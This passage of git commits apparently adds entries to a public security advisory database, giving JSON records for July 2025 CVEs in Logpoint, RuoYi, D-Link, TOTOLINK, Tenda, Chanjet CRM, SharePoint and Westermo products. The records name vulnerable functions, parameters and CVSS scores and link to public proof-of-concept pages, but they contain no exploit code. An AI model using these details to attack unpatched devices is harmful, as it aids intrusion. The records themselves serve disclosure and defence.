index 0000000000000..c33fa649de4d2 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-j873-wcr3-6m2p/GHSA-j873-wcr3-6m2p.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j873-wcr3-6m2p", + "modified": "2025-07-20T21:31:17Z", + "published": "2025-07-20T21:31:17Z", + "aliases": [ + "CVE-2025-54319" + ], + "details": "An issue was discovered in Westermo WeOS 5 (5.24 through 5.24.4). A threat actor potentially can gain unauthorized access to sensitive information via system logging information (syslog verbose logging that includes credentials).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54319" + }, + { + "type": "WEB", + "url": "https://www.westermo.com/-/media/Files/Cyber-security/westermo_sa_25-08_sensitive_information_in_logging.pdf?rev=40c4e78bd1524f639a89cd1b005e0f23&hash=64987A18FFECA633F23DB11FE5EAFA9A" + }, + { + "type": "WEB", + "url": "https://www.westermo.com/uk/support/security-advisories" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T21:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-jvq4-qh39-564c/GHSA-jvq4-qh39-564c.json b/advisories/unreviewed/2025/07/GHSA-jvq4-qh39-564c/GHSA-jvq4-qh39-564c.json new file mode 100644 index 0000000000000..d180dbef061f6 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-jvq4-qh39-564c/GHSA-jvq4-qh39-564c.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jvq4-qh39-564c", + "modified": "2025-07-20T21:31:17Z", + "published": "2025-07-20T21:31:17Z", + "aliases": [ + "CVE-2025-54316" + ], + "details": "An issue was discovered in Logpoint before 7.6.0. When creating reports, attackers can create custom Jinja templates that chained built-in filter functions to generate XSS payloads. These payloads can be rendered by the Logpoint Report Template engine, making it vulnerable to cross-site scripting (XSS) attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54316" + }, + { + "type": "WEB", + "url": "https://servicedesk.logpoint.com/hc/en-us/articles/28685383084317-XSS-vulnerability-in-Report-Templates-using-built-in-Jinja-filter-functions" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T19:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-pq32-79qf-69q2/GHSA-pq32-79qf-69q2.json b/advisories/unreviewed/2025/07/GHSA-pq32-79qf-69q2/GHSA-pq32-79qf-69q2.json new file mode 100644 index 0000000000000..8325bd3a6b9c4 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-pq32-79qf-69q2/GHSA-pq32-79qf-69q2.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pq32-79qf-69q2", + "modified": "2025-07-20T21:31:17Z", + "published": "2025-07-20T21:31:17Z", + "aliases": [ + "CVE-2025-54317" + ], + "details": "An issue was discovered in Logpoint before 7.6.0. An attacker with operator privileges can exploit a path traversal vulnerability when creating a Layout Template, which can lead to remote code execution (RCE).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54317" + }, + { + "type": "WEB", + "url": "https://servicedesk.logpoint.com/hc/en-us/articles/28685507675549-Path-Traversal-in-Layout-Templates-Allows-Remote-Code-Execution" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-23" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T19:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-r3pp-w9mm-8fcc/GHSA-r3pp-w9mm-8fcc.json b/advisories/unreviewed/2025/07/GHSA-r3pp-w9mm-8fcc/GHSA-r3pp-w9mm-8fcc.json new file mode 100644 index 0000000000000..8a55c2e364ef3 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-r3pp-w9mm-8fcc/GHSA-r3pp-w9mm-8fcc.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r3pp-w9mm-8fcc", + "modified": "2025-07-20T21:31:18Z", + "published": "2025-07-20T21:31:18Z", + "aliases": [ + "CVE-2025-7907" + ], + "details": "A vulnerability was found in yangzongzhuan RuoYi up to 4.8.1. It has been classified as problematic. Affected is an unknown function of the file ruoyi-admin/src/main/resources/application-druid.yml of the component Druid. The manipulation leads to use of default credentials. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7907" + }, + { + "type": "WEB", + "url": "https://github.com/yangzongzhuan/RuoYi/issues/297" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317022" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317022" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.618362" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1392" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T21:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-v2fm-69vv-qrc5/GHSA-v2fm-69vv-qrc5.json b/advisories/unreviewed/2025/07/GHSA-v2fm-69vv-qrc5/GHSA-v2fm-69vv-qrc5.json new file mode 100644 index 0000000000000..ba3ae4b8c24d2 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-v2fm-69vv-qrc5/GHSA-v2fm-69vv-qrc5.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v2fm-69vv-qrc5", + "modified": "2025-07-20T21:31:17Z", + "published": "2025-07-20T21:31:17Z", + "aliases": [ + "CVE-2025-7906" + ], + "details": "A vulnerability was found in yangzongzhuan RuoYi up to 4.8.1 and classified as critical. This issue affects the function uploadFile of the file ruoyi-admin/src/main/java/com/ruoyi/web/controller/common/CommonController.java. The manipulation of the argument File leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7906" + }, + { + "type": "WEB", + "url": "https://github.com/yangzongzhuan/RuoYi/issues/296" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317021" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317021" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.618361" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T20:15:24Z" + } +} \ No newline at end of file From 72e1c4e8d9406656e60208f1fc16eefa3b1938cf Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 21 Jul 2025 00:35:14 +0000 Subject: [PATCH 041/323] Publish Advisories GHSA-2p69-hxpm-h4q5 GHSA-6pmq-337c-gv96 GHSA-9858-3p63-w922 GHSA-p5w7-xqf9-725m GHSA-pfrw-775r-c344 GHSA-w833-57v8-vqcj GHSA-xcrc-8vqv-vc8r --- .../GHSA-2p69-hxpm-h4q5.json | 56 +++++++++++++++++ .../GHSA-6pmq-337c-gv96.json | 40 +++++++++++++ .../GHSA-9858-3p63-w922.json | 60 +++++++++++++++++++ .../GHSA-p5w7-xqf9-725m.json | 60 +++++++++++++++++++ .../GHSA-pfrw-775r-c344.json | 60 +++++++++++++++++++ .../GHSA-w833-57v8-vqcj.json | 56 +++++++++++++++++ .../GHSA-xcrc-8vqv-vc8r.json | 26 +++++++- 7 files changed, 357 insertions(+), 1 deletion(-) create mode 100644 advisories/unreviewed/2025/07/GHSA-2p69-hxpm-h4q5/GHSA-2p69-hxpm-h4q5.json create mode 100644 advisories/unreviewed/2025/07/GHSA-6pmq-337c-gv96/GHSA-6pmq-337c-gv96.json create mode 100644 advisories/unreviewed/2025/07/GHSA-9858-3p63-w922/GHSA-9858-3p63-w922.json create mode 100644 advisories/unreviewed/2025/07/GHSA-p5w7-xqf9-725m/GHSA-p5w7-xqf9-725m.json create mode 100644 advisories/unreviewed/2025/07/GHSA-pfrw-775r-c344/GHSA-pfrw-775r-c344.json create mode 100644 advisories/unreviewed/2025/07/GHSA-w833-57v8-vqcj/GHSA-w833-57v8-vqcj.json diff --git a/advisories/unreviewed/2025/07/GHSA-2p69-hxpm-h4q5/GHSA-2p69-hxpm-h4q5.json b/advisories/unreviewed/2025/07/GHSA-2p69-hxpm-h4q5/GHSA-2p69-hxpm-h4q5.json new file mode 100644 index 0000000000000..4915ac5692a7d --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-2p69-hxpm-h4q5/GHSA-2p69-hxpm-h4q5.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2p69-hxpm-h4q5", + "modified": "2025-07-21T00:33:35Z", + "published": "2025-07-21T00:33:35Z", + "aliases": [ + "CVE-2025-7910" + ], + "details": "A vulnerability classified as critical has been found in D-Link DIR-513 1.10. This affects the function sprintf of the file /goform/formSetWanNonLogin of the component Boa Webserver. The manipulation of the argument curTime leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. This vulnerability only affects products that are no longer supported by the maintainer.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7910" + }, + { + "type": "WEB", + "url": "https://github.com/buobo/bo-s-CVE/blob/main/DIR-513/formSetWanNonLogin.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317025" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317025" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.618594" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T22:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-6pmq-337c-gv96/GHSA-6pmq-337c-gv96.json b/advisories/unreviewed/2025/07/GHSA-6pmq-337c-gv96/GHSA-6pmq-337c-gv96.json new file mode 100644 index 0000000000000..99f1f39d4f609 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-6pmq-337c-gv96/GHSA-6pmq-337c-gv96.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6pmq-337c-gv96", + "modified": "2025-07-21T00:33:35Z", + "published": "2025-07-21T00:33:35Z", + "aliases": [ + "CVE-2025-53771" + ], + "details": "Improper limitation of a pathname to a restricted directory ('path traversal') in Microsoft Office SharePoint allows an authorized attacker to perform spoofing over a network.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53771" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53771" + }, + { + "type": "WEB", + "url": "https://www.bleepingcomputer.com/news/microsoft/microsoft-sharepoint-zero-day-exploited-in-rce-attacks-no-patch-available" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T23:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-9858-3p63-w922/GHSA-9858-3p63-w922.json b/advisories/unreviewed/2025/07/GHSA-9858-3p63-w922/GHSA-9858-3p63-w922.json new file mode 100644 index 0000000000000..2b3d8a75d9370 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-9858-3p63-w922/GHSA-9858-3p63-w922.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9858-3p63-w922", + "modified": "2025-07-21T00:33:36Z", + "published": "2025-07-21T00:33:36Z", + "aliases": [ + "CVE-2025-7911" + ], + "details": "A vulnerability classified as critical was found in D-Link DI-8100 1.0. This vulnerability affects the function sprintf of the file /upnp_ctrl.asp of the component jhttpd. The manipulation of the argument remove_ext_proto/remove_ext_port leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7911" + }, + { + "type": "WEB", + "url": "https://github.com/buobo/bo-s-CVE/blob/main/DI-8100/upnp_ctrl_asp.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317026" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317026" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.618640" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.618641" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T23:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-p5w7-xqf9-725m/GHSA-p5w7-xqf9-725m.json b/advisories/unreviewed/2025/07/GHSA-p5w7-xqf9-725m/GHSA-p5w7-xqf9-725m.json new file mode 100644 index 0000000000000..5ce758d1e47b5 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-p5w7-xqf9-725m/GHSA-p5w7-xqf9-725m.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p5w7-xqf9-725m", + "modified": "2025-07-21T00:33:36Z", + "published": "2025-07-21T00:33:36Z", + "aliases": [ + "CVE-2025-7913" + ], + "details": "A vulnerability, which was classified as critical, was found in TOTOLINK T6 4.1.5cu.748_B20211015. Affected is the function updateWifiInfo of the component MQTT Service. The manipulation of the argument serverIp leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7913" + }, + { + "type": "WEB", + "url": "https://github.com/AnduinBrian/Public/blob/main/Totolink%20T6/Vuln/7.md" + }, + { + "type": "WEB", + "url": "https://github.com/AnduinBrian/Public/blob/main/Totolink%20T6/Vuln/7.md#poc" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317028" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317028" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.618656" + }, + { + "type": "WEB", + "url": "https://www.totolink.net" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T00:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-pfrw-775r-c344/GHSA-pfrw-775r-c344.json b/advisories/unreviewed/2025/07/GHSA-pfrw-775r-c344/GHSA-pfrw-775r-c344.json new file mode 100644 index 0000000000000..456345ac90c49 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-pfrw-775r-c344/GHSA-pfrw-775r-c344.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pfrw-775r-c344", + "modified": "2025-07-21T00:33:36Z", + "published": "2025-07-21T00:33:36Z", + "aliases": [ + "CVE-2025-7912" + ], + "details": "A vulnerability, which was classified as critical, has been found in TOTOLINK T6 4.1.5cu.748_B20211015. This issue affects the function recvSlaveUpgstatus of the component MQTT Service. The manipulation of the argument s leads to buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7912" + }, + { + "type": "WEB", + "url": "https://github.com/AnduinBrian/Public/blob/main/Totolink%20T6/Vuln/6.md" + }, + { + "type": "WEB", + "url": "https://github.com/AnduinBrian/Public/blob/main/Totolink%20T6/Vuln/6.md#poc" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317027" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317027" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.618655" + }, + { + "type": "WEB", + "url": "https://www.totolink.net" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T23:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-w833-57v8-vqcj/GHSA-w833-57v8-vqcj.json b/advisories/unreviewed/2025/07/GHSA-w833-57v8-vqcj/GHSA-w833-57v8-vqcj.json new file mode 100644 index 0000000000000..7824237c6786b --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-w833-57v8-vqcj/GHSA-w833-57v8-vqcj.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w833-57v8-vqcj", + "modified": "2025-07-21T00:33:35Z", + "published": "2025-07-21T00:33:34Z", + "aliases": [ + "CVE-2025-7909" + ], + "details": "A vulnerability was found in D-Link DIR-513 1.0. It has been rated as critical. Affected by this issue is the function sprintf of the file /goform/formLanSetupRouterSettings of the component Boa Webserver. The manipulation of the argument curTime leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. This vulnerability only affects products that are no longer supported by the maintainer.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7909" + }, + { + "type": "WEB", + "url": "https://github.com/buobo/bo-s-CVE/blob/main/DIR-513/formLanSetupRouterSettings.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317024" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317024" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.618593" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-20T22:15:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-xcrc-8vqv-vc8r/GHSA-xcrc-8vqv-vc8r.json b/advisories/unreviewed/2025/07/GHSA-xcrc-8vqv-vc8r/GHSA-xcrc-8vqv-vc8r.json index 5d95aaa4483f0..8b3095b52c687 100644 --- a/advisories/unreviewed/2025/07/GHSA-xcrc-8vqv-vc8r/GHSA-xcrc-8vqv-vc8r.json +++ b/advisories/unreviewed/2025/07/GHSA-xcrc-8vqv-vc8r/GHSA-xcrc-8vqv-vc8r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xcrc-8vqv-vc8r", - "modified": "2025-07-20T03:30:19Z", + "modified": "2025-07-21T00:33:34Z", "published": "2025-07-20T03:30:19Z", "aliases": [ "CVE-2025-53770" @@ -19,9 +19,33 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53770" }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770" + }, { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53770" + }, + { + "type": "WEB", + "url": "https://research.eye.security/sharepoint-under-siege" + }, + { + "type": "WEB", + "url": "https://www.bleepingcomputer.com/news/microsoft/microsoft-sharepoint-zero-day-exploited-in-rce-attacks-no-patch-available" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/alerts/2025/07/20/microsoft-releases-guidance-exploitation-sharepoint-vulnerability-cve-2025-53770" + }, + { + "type": "WEB", + "url": "https://www.forbes.com/sites/daveywinder/2025/07/20/microsoft-confirms-ongoing-mass-sharepoint-attack---no-patch-available" + }, + { + "type": "WEB", + "url": "https://x.com/Shadowserver/status/1946900837306868163" } ], "database_specific": { From 09a832b207b93a452c606e539dd652536d7c1096 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 21 Jul 2025 03:31:37 +0000 Subject: [PATCH 042/323] Publish Advisories GHSA-hf3p-gpvx-q597 GHSA-5h4w-vg6x-93m2 GHSA-wq2q-3cwm-29r2 --- .../GHSA-hf3p-gpvx-q597.json | 6 +- .../GHSA-5h4w-vg6x-93m2.json | 52 +++++++++++++++++ .../GHSA-wq2q-3cwm-29r2.json | 56 +++++++++++++++++++ 3 files changed, 113 insertions(+), 1 deletion(-) create mode 100644 advisories/unreviewed/2025/07/GHSA-5h4w-vg6x-93m2/GHSA-5h4w-vg6x-93m2.json create mode 100644 advisories/unreviewed/2025/07/GHSA-wq2q-3cwm-29r2/GHSA-wq2q-3cwm-29r2.json diff --git a/advisories/unreviewed/2025/05/GHSA-hf3p-gpvx-q597/GHSA-hf3p-gpvx-q597.json b/advisories/unreviewed/2025/05/GHSA-hf3p-gpvx-q597/GHSA-hf3p-gpvx-q597.json index 89ae0f00987b9..a8f7021b5c3f7 100644 --- a/advisories/unreviewed/2025/05/GHSA-hf3p-gpvx-q597/GHSA-hf3p-gpvx-q597.json +++ b/advisories/unreviewed/2025/05/GHSA-hf3p-gpvx-q597/GHSA-hf3p-gpvx-q597.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hf3p-gpvx-q597", - "modified": "2025-07-09T21:31:00Z", + "modified": "2025-07-21T03:30:20Z", "published": "2025-05-22T15:34:51Z", "aliases": [ "CVE-2025-5024" @@ -31,6 +31,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2025:10742" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2025:11404" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2025-5024" diff --git a/advisories/unreviewed/2025/07/GHSA-5h4w-vg6x-93m2/GHSA-5h4w-vg6x-93m2.json b/advisories/unreviewed/2025/07/GHSA-5h4w-vg6x-93m2/GHSA-5h4w-vg6x-93m2.json new file mode 100644 index 0000000000000..a88080143dd62 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-5h4w-vg6x-93m2/GHSA-5h4w-vg6x-93m2.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5h4w-vg6x-93m2", + "modified": "2025-07-21T03:30:21Z", + "published": "2025-07-21T03:30:21Z", + "aliases": [ + "CVE-2025-7915" + ], + "details": "A vulnerability was found in Chanjet CRM 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /mail/mailinactive.php of the component Login Page. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7915" + }, + { + "type": "WEB", + "url": "https://github.com/qiantx/cve/blob/main/cve4.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.317030" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.317030" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.618873" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-21T01:15:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-wq2q-3cwm-29r2/GHSA-wq2q-3cwm-29r2.json b/advisories/unreviewed/2025/07/GHSA-wq2q-3cwm-29r2/GHSA-wq2q-3cwm-29r2.json new file mode 100644 index 0000000000000..41b7ccb7eebe1 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-wq2q-3cwm-29r2/GHSA-wq2q-3cwm-29r2.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wq2q-3cwm-29r2", + "modified": "2025-07-21T03:30:20Z", + "published": "2025-07-21T03:30:20Z", + "aliases": [ + "CVE-2025-7914" + ], + "details": "A vulnerability has been found in Tenda AC6 15.03.06.50 and classified as critical. Affected by this vulnerability is the function setparentcontrolinfo of the component httpd. The manipulation leads to buffer overflow. The attack can be launched remotely.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": 